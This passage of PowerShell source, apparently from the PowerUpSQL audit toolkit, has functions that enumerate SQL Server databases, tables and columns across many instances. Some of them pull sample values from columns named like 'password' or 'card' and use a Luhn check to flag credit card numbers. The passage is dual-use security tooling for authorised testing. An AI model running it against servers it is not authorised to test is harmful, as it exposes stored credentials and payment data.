if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } # Base query $QueryStart = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], a.database_id as [DatabaseId], a.name as [DatabaseName], SUSER_SNAME(a.owner_sid) as [DatabaseOwner], IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], a.is_trustworthy_on, a.is_db_chaining_on," # Version specific columns if([int]$SQLVersionShort -ge 10) { $QueryVerSpec = ' a.is_broker_enabled, a.is_encrypted, a.is_read_only,' } # Query end $QueryEnd = ' a.create_date, a.recovery_model_desc, b.filename as [FileName], (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) from sys.master_files where name like a.name) as [DbSizeMb], HAS_DBACCESS(a.name) as [has_dbaccess] FROM [sys].[databases] a INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1' # User defined filters $Filters = " $DatabaseFilter $NoDefaultsFilter $HasAccessFilter $SysAdminOnlyFilter ORDER BY a.database_id" $Query = "$QueryStart $QueryVerSpec $QueryEnd $Filters" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results for pipeline items $TblResults | ForEach-Object -Process { # Set version specific values if([int]$SQLVersionShort -ge 10) { $is_broker_enabled = $_.is_broker_enabled $is_encrypted = $_.is_encrypted $is_read_only = $_.is_read_only } else { $is_broker_enabled = 'NA' $is_encrypted = 'NA' $is_read_only = 'NA' } $null = $TblDatabases.Rows.Add( $_.ComputerName, $_.Instance, $_.DatabaseId, $_.DatabaseName, $_.DatabaseOwner, $_.OwnerIsSysadmin, $_.is_trustworthy_on, $_.is_db_chaining_on, $is_broker_enabled, $is_encrypted, $is_read_only, $_.create_date, $_.recovery_model_desc, $_.FileName, $_.DbSizeMb, $_.has_dbaccess ) } } End { # Return data $TblDatabases } } # ---------------------------------- # Get-SQLDatabaseThreaded # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDatabaseThreaded { <# .SYNOPSIS Returns database information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER NoDefaults Only select non default databases. .PARAMETER HasAccess Only select databases the current user has access to. .PARAMETER SysAdminOnly Only select databases owned by a sysadmin. .PARAMETER Threads Number of concurrent host threads. .EXAMPLE PS C:\> Get-SQLDatabaseThreaded -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseId : 7 DatabaseName : testdb DatabaseOwner : sa OwnerIsSysadmin : 1 is_trustworthy_on : True is_db_chaining_on : False is_broker_enabled : True is_encrypted : False is_read_only : False create_date : 4/13/2016 4:27:36 PM recovery_model_desc : FULL FileName : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf DbSizeMb : 3.19 has_dbaccess : 1 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseThreaded -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, HelpMessage = 'Only select non default databases.')] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Only select databases the current user has access to.')] [switch]$HasAccess, [Parameter(Mandatory = $false, HelpMessage = 'Only select databases owned by a sysadmin.')] [switch]$SysAdminOnly, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 2, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Create data tables for output $TblResults = New-Object -TypeName System.Data.DataTable $TblDatabases = New-Object -TypeName System.Data.DataTable $null = $TblDatabases.Columns.Add('ComputerName') $null = $TblDatabases.Columns.Add('Instance') $null = $TblDatabases.Columns.Add('DatabaseId') $null = $TblDatabases.Columns.Add('DatabaseName') $null = $TblDatabases.Columns.Add('DatabaseOwner') $null = $TblDatabases.Columns.Add('OwnerIsSysadmin') $null = $TblDatabases.Columns.Add('is_trustworthy_on') $null = $TblDatabases.Columns.Add('is_db_chaining_on') $null = $TblDatabases.Columns.Add('is_broker_enabled') $null = $TblDatabases.Columns.Add('is_encrypted') $null = $TblDatabases.Columns.Add('is_read_only') $null = $TblDatabases.Columns.Add('create_date') $null = $TblDatabases.Columns.Add('recovery_model_desc') $null = $TblDatabases.Columns.Add('FileName') $null = $TblDatabases.Columns.Add('DbSizeMb') $null = $TblDatabases.Columns.Add('has_dbaccess') # Setup database filter if($DatabaseName) { $DatabaseFilter = " and a.name like '$DatabaseName'" } else { $DatabaseFilter = '' } # Setup NoDefault filter if($NoDefaults) { $NoDefaultsFilter = " and a.name not in ('master','tempdb','msdb','model')" } else { $NoDefaultsFilter = '' } # Setup HasAccess filter if($HasAccess) { $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1' } else { $HasAccessFilter = '' } # Setup owner is sysadmin filter if($SysAdminOnly) { $SysAdminOnlyFilter = " and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1" } else { $SysAdminOnlyFilter = '' } # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { # Set instance $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Check version $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } # Base query $QueryStart = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], a.database_id as [DatabaseId], a.name as [DatabaseName], SUSER_SNAME(a.owner_sid) as [DatabaseOwner], IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], a.is_trustworthy_on, a.is_db_chaining_on," # Version specific columns if([int]$SQLVersionShort -ge 10) { $QueryVerSpec = ' a.is_broker_enabled, a.is_encrypted, a.is_read_only,' } # Query end $QueryEnd = ' a.create_date, a.recovery_model_desc, b.filename as [FileName], (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) from sys.master_files where name like a.name) as [DbSizeMb], HAS_DBACCESS(a.name) as [has_dbaccess] FROM [sys].[databases] a INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1' # User defined filters $Filters = " $DatabaseFilter $NoDefaultsFilter $HasAccessFilter $SysAdminOnlyFilter ORDER BY a.database_id" $Query = "$QueryStart $QueryVerSpec $QueryEnd $Filters" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results for pipeline items $TblResults | ForEach-Object -Process { # Set version specific values if([int]$SQLVersionShort -ge 10) { $is_broker_enabled = $_.is_broker_enabled $is_encrypted = $_.is_encrypted $is_read_only = $_.is_read_only } else { $is_broker_enabled = 'NA' $is_encrypted = 'NA' $is_read_only = 'NA' } $null = $TblDatabases.Rows.Add( $_.ComputerName, $_.Instance, $_.DatabaseId, $_.DatabaseName, $_.DatabaseOwner, $_.OwnerIsSysadmin, $_.is_trustworthy_on, $_.is_db_chaining_on, $is_broker_enabled, $is_encrypted, $is_read_only, $_.create_date, $_.recovery_model_desc, $_.FileName, $_.DbSizeMb, $_.has_dbaccess ) } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblDatabases } } # ---------------------------------- # Get-SQLTable # ---------------------------------- # Author: Scott Sutherland Function Get-SQLTable { <# .SYNOPSIS Returns table information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseName Database name to filter for. .PARAMETER TableName Table name to filter for. .PARAMETER NoDefaults Filter out results from default databases. .EXAMPLE PS C:\> Get-SQLTable -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb SchemaName : dbo TableName : NOCList TableType : BASE TABLE ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb SchemaName : dbo TableName : tracking TableType : BASE TABLE .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLTable -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Table name.')] [string]$TableName, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { $TblTables = New-Object -TypeName System.Data.DataTable # Setup table filter if($TableName) { $TableFilter = " where table_name like '%$TableName%'" } else { $TableFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin or DBO privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Grabbing tables from databases below:" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get tables for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - $DbName" } # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], TABLE_CATALOG AS [DatabaseName], TABLE_SCHEMA AS [SchemaName], TABLE_NAME as [TableName], TABLE_TYPE as [TableType] FROM [$DbName].[INFORMATION_SCHEMA].[TABLES] $TableFilter ORDER BY TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblTables = $TblTables + $TblResults } } End { # Return data $TblTables } } # ---------------------------------- # Get-SQLColumn # ---------------------------------- # Author: Scott Sutherland Function Get-SQLColumn { <# .SYNOPSIS Returns column information from target SQL Servers. Supports keyword search. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name filter. .PARAMETER TableName Table name filter. .PARAMETER ColumnName Column name filter. .PARAMETER ColumnNameSearch Column name filter that support wildcards. .PARAMETER NoDefaults Don't list anything from default databases. .EXAMPLE PS C:\> Get-SQLColumn -Verbose -Instance "SQLServer1" .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLColumn -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Table name.')] [string]$TableName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter by exact column name.')] [string]$ColumnName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Column name using wildcards in search. Supports comma seperated list.')] [string]$ColumnNameSearch, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblColumns = New-Object -TypeName System.Data.DataTable # Setup table filter if($TableName) { $TableNameFilter = " and TABLE_NAME like '%$TableName%'" } else { $TableNameFilter = '' } # Setup column filter if($ColumnName) { $ColumnFilter = " and column_name like '$ColumnName'" } else { $ColumnFilter = '' } # Setup column filter if($ColumnNameSearch) { $ColumnSearchFilter = " and column_name like '%$ColumnNameSearch%'" } else { $ColumnSearchFilter = '' } # Setup column search filter if($ColumnNameSearch) { $Keywords = $ColumnNameSearch.split(',') [int]$i = $Keywords.Count while ($i -gt 0) { $i = $i - 1 $Keyword = $Keywords[$i] if($i -eq ($Keywords.Count -1)) { $ColumnSearchFilter = "and column_name like '%$Keyword%'" } else { $ColumnSearchFilter = $ColumnSearchFilter + " or column_name like '%$Keyword%'" } } } } Process { # Note: Tables queried by this function typically require sysadmin or DBO privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get tables for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], TABLE_CATALOG AS [DatabaseName], TABLE_SCHEMA AS [SchemaName], TABLE_NAME as [TableName], COLUMN_NAME as [ColumnName], DATA_TYPE as [ColumnDataType], CHARACTER_MAXIMUM_LENGTH as [ColumnMaxLength] FROM [$DbName].[INFORMATION_SCHEMA].[COLUMNS] WHERE 1=1 $ColumnSearchFilter $ColumnFilter $TableNameFilter ORDER BY TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose # Append results $TblColumns = $TblColumns + $TblResults } } End { # Return data $TblColumns } } # --------------------------------------- # Get-SQLColumnSampleData # --------------------------------------- # Author: Scott Sutherland Function Get-SQLColumnSampleData { <# .SYNOPSIS Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER $NoOutput Don't output any sample data. .PARAMETER SampleSize Number of records to sample. .PARAMETER Keywords Number of records to sample. .PARAMETER DatabaseName Database to filter on. .PARAMETER ValidateCC Use Luhn formula to check if sample is a valid credit card. Column name filter that support wildcards. .PARAMETER NoDefaults Don't show columns from default databases. .EXAMPLE PS C:\> Get-SQLColumnSampleData -verbose -Instance SQLServer1\STANDARDDEV2014 -Keywords "account,credit,card" -SampleSize 5 -ValidateCC| ft -AutoSize VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria... VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card] VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card]. VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN ComputerName Instance Database Schema Table Column Sample RowCount IsCC ------------ -------- -------- ------ ----- ------ ------ -------- ---- SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleData -Keywords "account,credit,card" -SampleSize 5 -ValidateCC #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [switch]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Number of records to sample.')] [int]$SampleSize = 1, [Parameter(Mandatory = $false, HelpMessage = 'Comma seperated list of keywords to search for.')] [string]$Keywords = 'Password', [Parameter(Mandatory = $false, HelpMessage = 'Database name to filter on.')] [string]$DatabaseName, [Parameter(Mandatory = $false, HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')] [switch]$ValidateCC, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Database') $null = $TblData.Columns.Add('Schema') $null = $TblData.Columns.Add('Table') $null = $TblData.Columns.Add('Column') $null = $TblData.Columns.Add('Sample') $null = $TblData.Columns.Add('RowCount') if($ValidateCC) { $null = $TblData.Columns.Add('IsCC') } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : CONNECTION FAILED" } Return } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : START SEARCH DATA BY COLUMN" Write-Verbose -Message "$Instance : - Connection Success." Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." } if($NoDefaults) { # Search for columns $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose }else { $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose } } # Check if columns were found if($Columns) { # List columns found $Columns| ForEach-Object -Process { $sDatabaseName = $_.DatabaseName $sSchemaName = $_.SchemaName $sTableName = $_.TableName $sColumnName = $_.ColumnName $AffectedColumn = "[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]" $AffectedTable = "[$sDatabaseName].[$sSchemaName].[$sTableName]" $Query = "USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null" $QueryRowCount = "USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null" # Status user if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" Write-Verbose -Message "$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn." } # Get row count for column matches $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows # Get sample data Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | Select-Object -ExpandProperty $sColumnName | ForEach-Object -Process { if($ValidateCC) { # Check if value is CC $Value = 0 if([uint64]::TryParse($_,[ref]$Value)) { $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue } else { $LuhnCheck = 'False' } # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck) } else { # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount) } } } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - No columns were found that matched the search." } } # Status User if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : END SEARCH DATA BY COLUMN" } } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Get-SQLColumnSampleDataThreaded # --------------------------------------- # Author: Scott Sutherland Function Get-SQLColumnSampleDataThreaded { <# .SYNOPSIS Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER $NoOutput Don't output any sample data. .PARAMETER SampleSize Number of records to sample. .PARAMETER Keywords Comma seperated list of keywords to search for. .PARAMETER DatabaseName Database to filter on. .PARAMETER NoDefaults Don't show columns from default databases. .PARAMETER ValidateCC Use Luhn formula to check if sample is a valid credit card. .PARAMETER Threads Number of concurrent host threads. .EXAMPLE PS C:\> Get-SQLColumnSampleDataThreaded -verbose -Instance SQLServer1\STANDARDDEV2014 -Keywords "account,credit,card" -SampleSize 5 -ValidateCC | ft -AutoSize VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria... VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card] VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card]. VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN ComputerName Instance Database Schema Table Column Sample RowCount IsCC ------------ -------- -------- ------ ----- ------ ------ -------- ---- SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded -Keywords "account,credit,card" -SampleSize 5 -ValidateCC -Threads 10 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Number of records to sample.')] [int]$SampleSize = 1, [Parameter(Mandatory = $false, HelpMessage = 'Comma seperated list of keywords to search for.')] [string]$Keywords = 'Password', [Parameter(Mandatory = $false, HelpMessage = 'Database name to filter on.')] [string]$DatabaseName, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')] [switch]$ValidateCC, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Database') $null = $TblData.Columns.Add('Schema') $null = $TblData.Columns.Add('Table') $null = $TblData.Columns.Add('Column') $null = $TblData.Columns.Add('Sample') $null = $TblData.Columns.Add('RowCount') if($ValidateCC) { $null = $TblData.Columns.Add('IsCC') } # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { # Set instance $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : CONNECTION FAILED" } Return } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : START SEARCH DATA BY COLUMN" Write-Verbose -Message "$Instance : - Connection Success." Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." } if($NoDefaults) { # Search for columns $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose }else { 